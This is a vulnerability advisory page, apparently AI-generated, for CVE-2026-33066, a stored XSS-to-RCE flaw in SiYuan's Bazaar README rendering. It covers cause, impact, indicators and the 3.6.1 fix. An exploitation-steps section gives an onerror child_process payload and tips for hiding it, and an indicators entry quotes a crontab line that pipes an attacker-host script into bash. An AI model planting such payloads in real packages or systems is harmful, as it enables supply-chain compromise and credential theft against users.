CVE-2026-33066: 
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-33066 is a Stored XSS to Remote Code Execution (RCE) vulnerability in SiYuan's Bazaar (community marketplace) caused by unsanitized rendering of package README content. It affects SiYuan versions up to and including 3.5.9, and was disclosed on March 17, 2026, with a patch released in version 3.6.1. The vulnerability carries a CVSS v3.1 base score of 9.0 (Critical) per Feedly, with the official advisory citing 9.6 (Critical) (GitHub Advisory, SiYuan Advisory).

Technical details

The root cause (CWE-79: Stored XSS) lies in two compounding flaws: the backend renderREADME function in kernel/bazaar/package.go instantiates the Lute Markdown engine via lute.New() without calling SetSanitize(true), allowing raw HTML in Markdown to pass through unmodified; and the frontend (app/src/config/bazaar.ts:607) assigns the returned HTML directly to innerHTML without client-side sanitization such as DOMPurify. Critically, SiYuan's Electron configuration (app/electron/main.js:422-426) sets nodeIntegration: true and contextIsolation: false, meaning any JavaScript executing in the renderer has direct access to Node.js APIs — escalating XSS to full OS-level RCE. Payloads can be embedded in numerous HTML elements (img, svg, details, picture, video, audio, iframe, object, embed, math, etc.), making detection during code review difficult (GitHub Advisory, SiYuan Advisory).

Impact

Successful exploitation grants an attacker full remote code execution on the victim's desktop system as the SiYuan application user, across Windows, macOS, and Linux. An attacker can steal SiYuan API tokens, application configuration, SSH keys, browser credentials, and arbitrary files, as well as install persistent backdoors (e.g., Windows scheduled tasks or Linux crontab entries). Because the attack is delivered via the official SiYuan Bazaar marketplace, it constitutes a supply-chain attack vector with broad reach to any user who browses and views a malicious package's details (SiYuan Advisory, GitHub Advisory).

Exploitability

A detailed proof-of-concept with step-by-step exploitation instructions is publicly available in the official security advisory, including concrete payload examples using img onerror, svg onload, and details ontoggle elements (SiYuan Advisory). Exploitation requires only that a victim user clicks to view the malicious package's details in the Bazaar — a single user interaction. The EPSS score is approximately 0.109% (29th percentile), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing (GitHub Advisory). The vulnerability was reported by researcher 0xkakash1 and no threat actor attribution has been identified.

Exploitation steps

  1. Create a malicious package repository: Create a GitHub repository with a valid SiYuan plugin, theme, or template structure. Embed a JavaScript payload in README.md using an HTML element such as <img src=x onerror="require('child_process').exec('calc.exe')"> — the Lute engine preserves raw HTML because SetSanitize(true) is not called.
  2. Obfuscate the payload (optional): For stealth, bury the payload inside a legitimate-looking table, image block, or <details> element with an ontoggle handler (e.g., <details open ontoggle="...">) so it blends with real README content and fires without additional user interaction with the element.
  3. Submit to the SiYuan Bazaar: Submit the repository to the official SiYuan Bazaar via the standard community contribution process.
  4. Wait for victim interaction: When a SiYuan desktop user browses the Bazaar and clicks on the malicious package to view its README/details, the backend renders the README via renderREADME() without sanitization and returns unsanitized HTML.
  5. XSS triggers RCE: The frontend assigns the HTML to innerHTML; the injected event handler fires. Because Electron runs with nodeIntegration: true and contextIsolation: false, the JavaScript payload has direct access to Node.js APIs and executes arbitrary OS commands.
  6. Escalate and persist: Use the RCE to exfiltrate credentials (SiYuan API token, SSH keys, browser credentials), establish a reverse shell, or install a persistent backdoor (Windows scheduled task or Linux crontab) (SiYuan Advisory, GitHub Advisory).

Indicators of compromise

  • Network: Unexpected outbound connections from the SiYuan process to unknown external IPs or attacker-controlled domains (e.g., for reverse shells or stage-2 payload retrieval); DNS lookups for attacker infrastructure triggered shortly after Bazaar browsing activity.
  • Process: Unusual child processes spawned by the SiYuan Electron process (e.g., cmd.exe, powershell.exe, /bin/bash, curl, wget) executing commands not initiated by the user; calc.exe or other test binaries launched unexpectedly (PoC indicator).
  • File System: New or modified crontab entries (@reboot curl -s https://attacker.com/stage2.sh | bash) on Linux/macOS; new Windows scheduled tasks created by the SiYuan user account; unexpected scripts or executables written to the SiYuan data directory or temp folders.
  • Logs: SiYuan application logs showing API calls to /api/bazaar/getBazaarPackageREADME for recently added or unfamiliar packages; system logs recording new scheduled task or crontab creation events coinciding with Bazaar usage.
  • Credentials/Config: Unauthorized access to SiYuan API tokens or configuration files; SSH key files accessed or copied outside of normal user activity; browser credential stores accessed by the SiYuan process (SiYuan Advisory).

Mitigation and workarounds

Upgrade SiYuan to version 3.6.1 or later immediately, which applies the fix in commit b382f50e1880ed996364509de5a10a72d7409428 by adding luteEngine.SetSanitize(true) to the renderPackageREADME function (Patch Commit). As a temporary workaround, avoid browsing or installing packages from the Bazaar marketplace — particularly from unfamiliar or recently created sources — until patched. The advisory also recommends adding client-side sanitization via DOMPurify as defense-in-depth, and long-term hardening of the Electron configuration by setting nodeIntegration: false, contextIsolation: true, and sandbox: true (SiYuan Advisory).

Community reactions

The vulnerability was reported by security researcher 0xkakash1 and published to the GitHub Advisory Database on March 17–18, 2026. A technical write-up was published at infinitsec.net titled "SiYuan has Stored XSS to RCE via Unsanitized Bazaar README Rendering," highlighting the supply-chain attack angle. The CVE was also tracked by Bluesky CVE bots and aggregated by multiple vulnerability intelligence platforms shortly after disclosure (infinitsec.net, GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-103678HIGH8.1
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103680MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103679MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103497MEDIUM5.5
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesOct 01, 2026
CVE-2026-103496MEDIUM5.4
  • YouTrack logoYouTrack
  • youtrack
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management